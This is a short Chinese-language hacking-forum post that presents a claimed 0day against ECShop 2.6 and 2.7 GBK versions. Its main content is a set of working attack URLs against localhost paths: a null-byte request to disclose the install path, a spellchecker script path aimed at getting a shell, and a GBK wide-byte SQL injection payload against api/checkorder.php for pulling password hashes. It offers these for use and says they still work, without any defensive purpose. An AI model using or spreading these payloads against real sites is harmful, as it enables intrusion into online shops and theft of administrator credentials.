据说该0day是fjhgx(俺是农村的)大牛发现的。。。

Exp等黑小子发吧。。。或者自己手动也行。。。 以前很早的东西了   刚测试还可以用 至于有一些能不能搞 自行测试   这些东西都可以想起以前的兄弟们 我对这些已经不敢兴趣了 有什么好东西我会陆续放出 工具我会打包！ ecshop 通杀2.6*2.7 GBK版本 附上测试图！

（射出编码 0x全部替换）

（替换后的编码） （lcx的php注射工具 转换编码 From Hex 转换后得到MD5）

ecshop GetShell

http://localhost/ECShop/demo/index.php?a=1111111111%00 爆路径 http://localhost/ECShop/includes\fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts/spellchecker.php 测试 http://localhost/api/checkorder.php?username=%CE%27 or 1=1 %23

 

=============